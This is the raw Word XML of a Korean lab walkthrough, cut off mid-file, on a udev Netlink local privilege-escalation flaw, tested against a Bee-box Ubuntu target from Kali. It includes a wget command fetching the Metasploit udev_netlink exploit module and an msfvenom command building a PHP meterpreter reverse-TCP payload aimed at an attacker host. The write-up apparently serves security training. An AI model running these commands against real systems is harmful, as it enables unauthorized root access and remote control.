    <w:p w14:paraId="0D4FE8AF" w14:textId="4D9E380C" w:rsidR="00DA2D7E" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D90039" w14:textId="77777777" w:rsidR="00DA2D7E" w:rsidRPr="00CC3B11" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0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CC3B11" w14:paraId="30FAAC52" w14:textId="77777777" w:rsidTr="00B24BB3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247A110" w14:textId="43749EC1" w:rsidR="00B24BB3" w:rsidRPr="006F2E6D" w:rsidRDefault="00CC3B11" w:rsidP="00B24BB3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lastRenderedPageBreak/>
              <w:t>4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L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ocal Privile</w:t>
            </w:r>
            <w:r w:rsidR="00B24BB3">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>ge Escalation(udev)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B11" w14:paraId="039CCAD6" w14:textId="77777777" w:rsidTr="00B24BB3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1BB18089" w14:textId="77777777" w:rsidR="00CC3B11" w:rsidRPr="00637AED" w:rsidRDefault="00CC3B11" w:rsidP="00B24BB3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CC3B11" w14:paraId="6A581D98" w14:textId="77777777" w:rsidTr="00B24BB3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311E16A9" w14:textId="6572C4A5" w:rsidR="00CC3B11" w:rsidRPr="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3">
            <w:pPr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1. udev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개요</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B11" w14:paraId="74AE82E1" w14:textId="77777777" w:rsidTr="00B24BB3">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7123D842" w14:textId="77777777" w:rsidR="00CC3B11" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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dev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란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‘Userpace Device’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의 약자로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Linux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환경에서 커널을 위한 장치 관리자 역할을 한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="528886AA" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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dev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는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undeved/ systcmd-udev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라는 이름의 데몬으로 동작 후 시스템에서 디바이스 노드를 생성한다.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디 바이스가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detect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되면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sysfs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에 등록되고 해당 디바이스는 사용자의 공간에서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/sys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에 등록된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F856BE" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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그 다음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udev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데몬으로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Netlink Socket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을 이용하여 새로운 디바이스가 생성되었다는 메시지를 전송하는데,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만약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Netlink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메시지가 커널 공간에서 시작되는지 여부를 확인하지 않으면 공격자는 변조된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Netlink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메시지를 전송하여 최상위 권한(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root)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를 획득할 수 있게 된다.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</w:p>
          <w:p w14:paraId="51744601" w14:textId="216EC7EB" w:rsidR="00B24BB3" w:rsidRPr="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="76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</w:tr>
      <w:tr w:rsidR="00CC3B11" w14:paraId="5ADBA1AC" w14:textId="77777777" w:rsidTr="00B24BB3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65DFEEDE" w14:textId="1EBF3017" w:rsidR="00CC3B11" w:rsidRPr="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3">
            <w:pPr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B24BB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2. Local Privilege Escalation(udev)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B11" w14:paraId="538838C6" w14:textId="77777777" w:rsidTr="00B24BB3">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30538006" w14:textId="3419E08C" w:rsidR="00B24BB3" w:rsidRPr="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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B24BB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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.4.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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이전의 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>udev</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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에서는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N</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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etlink </w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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메세지를 검증하지 않기 때문에 변조된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N</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>etlink</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>메세지의 의해서 권한을 획득 할 수 있다.</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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</w:p>
          <w:p w14:paraId="36D63A52" w14:textId="59306304" w:rsidR="00CC3B11" w:rsidRPr="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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B24BB3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이 시나리오는 리눅스 커널 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>udev</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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취약점을 이용하여 로컬 권한을 획득하는 내용이다.</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="161A5217" w14:textId="77777777" w:rsidR="00CC3B11" w:rsidRDefault="00CC3B11" w:rsidP="00CC3B11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CC3B11" w14:paraId="4DB3C4EE" w14:textId="77777777" w:rsidTr="00B24BB3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0ACBF647" w14:textId="77777777" w:rsidR="00CC3B11" w:rsidRPr="00BE7966" w:rsidRDefault="00CC3B11" w:rsidP="00B24BB3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20B611A8" wp14:editId="03D00E8F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27" name="직사각형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A1D18" id="직사각형 127" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.5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yfGtQIAAK8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CC3B11" w14:paraId="23B94433" w14:textId="77777777" w:rsidTr="00B24BB3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0496AEB7" w14:textId="1D762A80" w:rsidR="00CC3B11" w:rsidRPr="0050741D" w:rsidRDefault="00CC3B11" w:rsidP="00B24BB3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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B11" w14:paraId="0A69E327" w14:textId="77777777" w:rsidTr="00B24BB3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57A2854" w14:textId="77777777" w:rsidR="00CC3B11" w:rsidRPr="00BE7966" w:rsidRDefault="00CC3B11" w:rsidP="00B24BB3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5FCB4416" wp14:editId="13FFEC6B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28" name="직사각형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376D3" id="직사각형 128" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-3pt;margin-top:-53.15pt;width:533.25pt;height:766.5pt;z-index:-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CC3B11" w14:paraId="6A71AC43" w14:textId="77777777" w:rsidTr="00B24BB3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1B3C1155" w14:textId="04DEB3A5" w:rsidR="00CC3B11" w:rsidRPr="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="36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B24BB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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. </w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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실습환경</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B11" w14:paraId="454CCD6C" w14:textId="77777777" w:rsidTr="00B24BB3">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10AA0928" w14:textId="77777777" w:rsidR="00CC3B11" w:rsidRDefault="00CC3B11" w:rsidP="00B24BB3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19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483"/>
              <w:gridCol w:w="3483"/>
              <w:gridCol w:w="3484"/>
            </w:tblGrid>
            <w:tr w:rsidR="00B24BB3" w14:paraId="1C7EBBEB" w14:textId="77777777" w:rsidTr="00B24B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5" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2BCA5475" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3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</w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3485" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="0C16DF87" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB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OS</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3485" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="6489FB68" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB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IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00B24BB3" w14:paraId="008EB8CA" w14:textId="77777777" w:rsidTr="00B24B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BF8DE" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3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공격 호스트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735F7" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24B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Kali Linux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E0BFE" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24B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192.168.0.150/24</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00B24BB3" w14:paraId="4D675588" w14:textId="77777777" w:rsidTr="00B24B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3C29E" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3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타겟 호스트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E322A" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24B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Ubuntu(Bee-box)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769EC" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24B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192.168.0.146/24</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1001B004" w14:textId="77777777" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3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3A7BEBB" w14:textId="662E0EFB" w:rsidR="00B24BB3" w:rsidRPr="00BE7966" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3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CC3B11" w14:paraId="522DB4DE" w14:textId="77777777" w:rsidTr="00B24BB3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2E7178A2" w14:textId="4EB96995" w:rsidR="00CC3B11" w:rsidRPr="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00B24BB3">
            <w:pPr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B24BB3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 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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 2. Local Privilege Escalation(udev) </w:t>
            </w:r>
            <w:r w:rsidRPr="00B24BB3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공격</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BA87D31" w14:textId="2235970C" w:rsidR="00B24BB3" w:rsidRPr="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00BC3275">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="300" w:firstLine="600"/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) </w:t>
      </w:r>
      <w:r w:rsidRPr="00B24BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>보안 레벨 선택 및 시나리오 선택</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B048F71" w14:textId="77777777" w:rsidR="00796E71" w:rsidRDefault="00B24BB3" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B24BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002625EC" w:rsidRPr="00B24BB3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Local Privilege Escalation(udev</w:t>
      </w:r>
      <w:r w:rsidR="002625EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D93EB6D" w14:textId="753846E4" w:rsidR="00B24BB3" w:rsidRDefault="00B24BB3" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B24BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B24BB3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">low </w:t>
      </w:r>
      <w:r w:rsidRPr="00B24BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">선택 후, set 클릭 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729DA82D" w14:textId="02CF7CA3" w:rsidR="002625EC" w:rsidRDefault="00A52EA8" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1134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0650553" wp14:editId="0EAFE9F8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1751800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>339293</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1997848" cy="157683"/>
                <wp:effectExtent l="19050" t="19050" r="21590" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="1040" name="직사각형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848" cy="1576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C1203" id="직사각형 1040" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:137.95pt;margin-top:26.7pt;width:157.3pt;height:12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" filled="f" strokecolor="#c00000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2A7146" wp14:editId="3CF28C9B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3708971</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1053465</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2013217" cy="388204"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="1039" name="직사각형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217" cy="388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4BFA8" id="직사각형 1039" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:292.05pt;margin-top:82.95pt;width:158.5pt;height:30.5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" filled="f" strokecolor="#c00000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A71FD5" wp14:editId="789EEFBC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3745966</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>788969</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2013217" cy="184417"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1038" name="직사각형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217" cy="1844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425D1" id="직사각형 1038" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:294.95pt;margin-top:62.1pt;width:158.5pt;height:14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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002625EC" w:rsidRPr="002625EC">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E1B12EF" wp14:editId="6130DD42">
            <wp:extent cx="5760000" cy="3080667"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="24765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80667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554C7A" w14:textId="127FC4D3" w:rsidR="002625EC" w:rsidRPr="00B24BB3" w:rsidRDefault="002625EC" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1134"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E35173" w14:textId="303D1FA1" w:rsidR="002625EC" w:rsidRDefault="002625EC" w:rsidP="00BC3275">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidR="00796E71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">역방향 </w:t>
      </w:r>
      <w:r w:rsidR="00796E71">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Exploti Payload </w:t>
      </w:r>
      <w:r w:rsidR="00796E71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>생성</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AAC73C" w14:textId="2F7B14B6" w:rsidR="00BD2937" w:rsidRDefault="00796E71" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796E71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD2937">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00BD2937">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dev exploit </w:t>
      </w:r>
      <w:r w:rsidR="00BD2937">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>다운로드</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFFD472" w14:textId="02CC4C89" w:rsidR="00B30B35" w:rsidRDefault="00BD2937" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="200" w:firstLineChars="500" w:firstLine="1000"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2937">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidR="00B30B35" w:rsidRPr="006B59B2">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:b/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/rapid7/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DA4CD98" w14:textId="3128F305" w:rsidR="00BD2937" w:rsidRDefault="00BD2937" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="400" w:left="800" w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD2937">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>metasploit-framework/master/modules/exploits/linux/local/udev_netlink.rb</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2937">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A343A1" wp14:editId="48890085">
            <wp:extent cx="5760000" cy="484128"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1143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4128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7A9EBD7" w14:textId="77777777" w:rsidR="00BD2937" w:rsidRDefault="00BD2937" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59079927" w14:textId="283DD537" w:rsidR="00BD2937" w:rsidRDefault="00BD2937" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/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341A109B" wp14:editId="7AB2FC6C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>157053</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:align>bottom</wp:align>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10030480"/>
                <wp:effectExtent l="0" t="0" r="9525" b="8890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0030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3F1A2" id="직사각형 139" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:12.35pt;margin-top:0;width:533.25pt;height:789.8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  <w:r w:rsidRPr="00BD2937">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">을 통해 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">형식의 </w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">역방향 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploit Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>를 생성</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3F1303" w14:textId="77777777" w:rsidR="00C065AD" w:rsidRDefault="00BD2937" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800" w:firstLineChars="150" w:firstLine="300"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t># msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker IP LPORT=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">임의포트 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2820E" w14:textId="0CDD2E1F" w:rsidR="00BD2937" w:rsidRDefault="00BD2937" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800" w:firstLineChars="150" w:firstLine="300"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/root/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>바탕화면/파일명지정</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040B6155" w14:textId="0DAF8858" w:rsidR="00B30B35" w:rsidRDefault="00A52EA8" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="8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0E42C1" wp14:editId="511E27F8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>599195</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>27150</wp:posOffset>
                </wp:positionV>
